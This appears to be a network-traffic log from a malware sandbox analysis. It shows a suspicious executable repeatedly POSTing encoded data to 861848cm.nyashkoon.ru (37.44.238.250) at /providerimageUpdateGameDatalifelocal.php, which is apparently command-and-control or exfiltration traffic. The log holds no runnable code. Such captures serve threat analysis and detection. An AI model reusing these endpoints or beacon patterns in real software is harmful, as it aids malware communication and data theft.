                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:07.103657007 CET | 1024 | OUT | Data Raw: 56 55 5f 5e 56 5b 50 5f 5a 5f 52 51 54 5b 5b 53 55 50 59 5f 51 51 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VU_^V[P_Z_RQT[[SUPY_QQRZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%/Y6(+<\> ():)>90 /%?Z90_#'>2)'X$.Q-"


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            105 | 192.168.2.4 | 50112 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:07.254446983 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1284
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:07.602330923 CET | 1284 | OUT | Data Raw: 56 5f 5a 5a 56 5a 50 5b 5a 5f 52 51 54 5c 5b 5f 55 50 59 56 51 52 52 5d 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V_ZZVZP[Z_RQT\[_UPYVQRR]TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%Y,Y"++0<\*2=*%+4#<1<-<95(\#&_1'X$.Q->
                                                                                            Nov 5, 2024 23:54:07.964236975 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:08.045305967 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:05 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 23 04 2b 5c 2e 11 30 38 3b 0d 2a 3e 31 13 3f 30 06 07 2f 31 2c 5a 3e 33 20 11 2a 3b 33 0c 23 3f 20 07 36 31 35 5d 37 32 33 1d 28 11 21 5f 05 1d 39 5b 24 17 3f 0c 29 32 08 16 2a 24 2f 19 32 30 2c 45 2a 15 04 13 20 29 21 0d 25 07 39 5d 31 31 30 0c 2a 34 39 5e 2d 11 2f 55 32 3a 2a 57 09 16 20 54 24 0d 3c 00 29 21 2c 06 27 00 36 06 25 2a 28 0b 2a 2f 3f 58 34 1a 0c 58 2b 23 34 02 23 37 0c 11 33 04 26 40 24 3e 2c 09 3f 22 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: #+\.08;*>1?0/1,Z>3 *;3#? 615]723(!_9[$?)2*$/20,E* )!%9]110*49^-/U2:*W T$<)!,'6%*(*/?X4X+#4#73&@$>,?"&U" T0]O


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            106 | 192.168.2.4 | 50113 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:07.545978069 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1016
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:07.899245024 CET | 1016 | OUT | Data Raw: 56 55 5f 5f 56 5a 50 5a 5a 5f 52 51 54 5a 5b 58 55 57 59 5e 51 51 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VU__VZPZZ_RQTZ[XUWY^QQRRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%^/<-?^$_>0(]>5_>=^0(( >Q<.].54^19'X$.Q-.
                                                                                            Nov 5, 2024 23:54:08.359348059 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:08.433065891 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:06 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            107 | 192.168.2.4 | 50114 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:08.570498943 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:54:08.915697098 CET | 1024 | OUT | Data Raw: 53 56 5a 5d 56 58 50 52 5a 5f 52 51 54 5e 5b 5a 55 5c 59 59 51 55 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SVZ]VXPRZ_RQT^[ZU\YYQURZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%X,/-+_<(\*1*>>Z%(<Y -<.:%/#7%29'X$.Q-6
                                                                                            Nov 5, 2024 23:54:09.380712986 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:09.457796097 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:07 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            108 | 192.168.2.4 | 50115 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:09.592510939 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:09.946111917 CET | 1024 | OUT | Data Raw: 56 55 5a 5d 56 5a 50 5a 5a 5f 52 51 54 5e 5b 52 55 56 59 5c 51 52 52 59 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VUZ]VZPZZ_RQT^[RUVY\QRRYTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&;6( Y>##**)^)6Z3_49<?.&3 7&9'X$.Q-6
                                                                                            Nov 5, 2024 23:54:10.403675079 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:10.479734898 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:08 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                            109 | 192.168.2.4 | 50116 | 37.44.238.250 | 80
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:10.612543106 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:10.961744070 CET | 1024 | OUT | Data Raw: 56 5f 5a 5a 56 5f 55 58 5a 5f 52 51 54 5b 5b 5f 55 51 59 5e 51 53 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V_ZZV_UXZ_RQT[[_UQY^QSRZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%/2R?+>3<[*9)_>"$8+7:W+.(.C'#$:Y&'X$.Q-"
                                                                                            Nov 5, 2024 23:54:11.436425924 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:11.506879091 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:09 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                            110 | 192.168.2.4 | 50117 | 37.44.238.250 | 80
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:11.637455940 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:11.992942095 CET1024OUTData Raw: 56 5e 5f 5b 56 5f 50 5d 5a 5f 52 51 54 5f 5b 53 55 53 59 5a 51 51 52 53 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V^_[V_P]Z_RQT_[SUSYZQQRSTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%;>(;<_?+*_>_3; >+.C ^4'&9'X$.Q-2
                                                                                            Nov 5, 2024 23:54:12.457803011 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:12.536762953 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:10 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


Session ID | Source IP | Source Port | Destination IP | Destination Port
111 | 192.168.2.4 | 50118 | 37.44.238.250 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:54:12.671814919 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
    Host: 861848cm.nyashkoon.ru
    Content-Length: 1024
    Expect: 100-continue
    Connection: Keep-Alive
Nov 5, 2024 23:54:13.024193048 CET | 1024 | OUT | Data Raw: (encoded request body)


Session ID | Source IP | Source Port | Destination IP | Destination Port
112 | 192.168.2.4 | 50119 | 37.44.238.250 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:54:13.066154957 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
    Host: 861848cm.nyashkoon.ru
    Content-Length: 1284
    Expect: 100-continue
    Connection: Keep-Alive
Nov 5, 2024 23:54:13.414905071 CET | 1284 | OUT | Data Raw: (encoded request body)
Nov 5, 2024 23:54:13.875760078 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:54:13.953942060 CET | 308 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 22:54:11 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 152
    Connection: keep-alive
    Data Raw: (encoded response body)


Session ID | Source IP | Source Port | Destination IP | Destination Port
113 | 192.168.2.4 | 50120 | 37.44.238.250 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:54:13.274378061 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
    Host: 861848cm.nyashkoon.ru
    Content-Length: 1016
    Expect: 100-continue
    Connection: Keep-Alive
Nov 5, 2024 23:54:13.633609056 CET | 1016 | OUT | Data Raw: (encoded request body)
Nov 5, 2024 23:54:14.094239950 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:54:14.167088032 CET | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 22:54:12 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 32 56 59 50
    Data Ascii: 2VYP


Session ID | Source IP | Source Port | Destination IP | Destination Port
114 | 192.168.2.4 | 50121 | 37.44.238.250 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:54:14.296658993 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
    Host: 861848cm.nyashkoon.ru
    Content-Length: 1024
    Expect: 100-continue
Nov 5, 2024 23:54:14.649203062 CET | 1024 | OUT | Data Raw: (encoded request body)
Nov 5, 2024 23:54:15.110356092 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:54:15.180246115 CET | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 22:54:13 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 32 56 59 50
    Data Ascii: 2VYP


Session ID | Source IP | Source Port | Destination IP | Destination Port
115 | 192.168.2.4 | 50122 | 37.44.238.250 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:54:15.308584929 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
    Host: 861848cm.nyashkoon.ru
    Content-Length: 1024
    Expect: 100-continue
Nov 5, 2024 23:54:15.664985895 CET | 1024 | OUT | Data Raw: (encoded request body)
Nov 5, 2024 23:54:16.130914927 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:54:16.209439039 CET | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 22:54:14 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 32 56 59 50
    Data Ascii: 2VYP


Session ID | Source IP | Source Port | Destination IP | Destination Port
116 | 192.168.2.4 | 50123 | 37.44.238.250 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:54:16.342113972 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
    Host: 861848cm.nyashkoon.ru
    Content-Length: 1024
    Expect: 100-continue
    Connection: Keep-Alive
Nov 5, 2024 23:54:16.696072102 CET | 1024 | OUT | Data Raw: (encoded request body)
Nov 5, 2024 23:54:17.159926891 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:54:17.238702059 CET | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 22:54:15 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 32 56 59 50
    Data Ascii: 2VYP


Session ID | Source IP | Source Port | Destination IP | Destination Port
117 | 192.168.2.4 | 50124 | 37.44.238.250 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:54:17.369514942 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
    Host: 861848cm.nyashkoon.ru
    Content-Length: 1024
    Expect: 100-continue
    Connection: Keep-Alive
Nov 5, 2024 23:54:17.727329016 CET | 1024 | OUT | Data Raw: (encoded request body)
Nov 5, 2024 23:54:18.173288107 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:54:18.249480009 CET | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 22:54:16 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 32 56 59 50
    Data Ascii: 2VYP


Session ID | Source IP | Source Port | Destination IP | Destination Port
118 | 192.168.2.4 | 50125 | 37.44.238.250 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:54:18.378263950 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
    Host: 861848cm.nyashkoon.ru
    Content-Length: 1024
    Expect: 100-continue
    Connection: Keep-Alive
Nov 5, 2024 23:54:18.727356911 CET | 1024 | OUT | Data Raw: (encoded request body)


Session ID | Source IP | Source Port | Destination IP | Destination Port
119 | 192.168.2.4 | 50127 | 37.44.238.250 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:54:19.150240898 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
    Host: 861848cm.nyashkoon.ru
    Content-Length: 1024
    Expect: 100-continue
    Connection: Keep-Alive
Nov 5, 2024 23:54:19.508591890 CET | 1024 | OUT | Data Raw: (encoded request body)
Nov 5, 2024 23:54:19.964268923 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:54:20.032934904 CET | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 22:54:17 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 32 56 59 50
    Data Ascii: 2VYP


Session ID | Source IP | Source Port | Destination IP | Destination Port
120 | 192.168.2.4 | 50126 | 37.44.238.250 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:54:19.150259018 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
    Host: 861848cm.nyashkoon.ru
    Content-Length: 1260
    Expect: 100-continue
    Connection: Keep-Alive
Nov 5, 2024 23:54:19.508591890 CET | 1260 | OUT | Data Raw: (encoded request body)
Nov 5, 2024 23:54:19.964112043 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:54:20.045540094 CET | 308 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 22:54:17 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 152
    Connection: keep-alive
    Data Raw: (encoded response body)


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                            121 | 192.168.2.4 | 50128 | 37.44.238.250 | 80
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:20.162725925 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:54:20.508552074 CET | 1024 | OUT | Data Raw: 56 52 5f 59 53 5b 50 5a 5a 5f 52 51 54 5e 5b 53 55 52 59 5a 51 52 52 5d 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VR_YS[PZZ_RQT^[SURYZQRR]TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&;Y*V?8;(U \):>50(^#?"U+>3968X!71%9'X$.Q-6
                                                                                            Nov 5, 2024 23:54:20.985436916 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:21.056068897 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:18 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                            122 | 192.168.2.4 | 50129 | 37.44.238.250 | 80
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:21.183181047 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:21.539843082 CET | 1024 | OUT | Data Raw: 56 57 5f 59 53 5a 50 5b 5a 5f 52 51 54 52 5b 58 55 5d 59 5e 51 52 52 5f 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VW_YSZP[Z_RQTR[XU]Y^QRR_TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%\,<"<0Y<4==^?-=$;4^7/=).:< Q:%'X$.Q-
                                                                                            Nov 5, 2024 23:54:21.994848013 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:22.071748018 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:20 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                            123 | 192.168.2.4 | 50130 | 37.44.238.250 | 80
                                                                                            Timestamp | Bytes transferred | Direction | Data
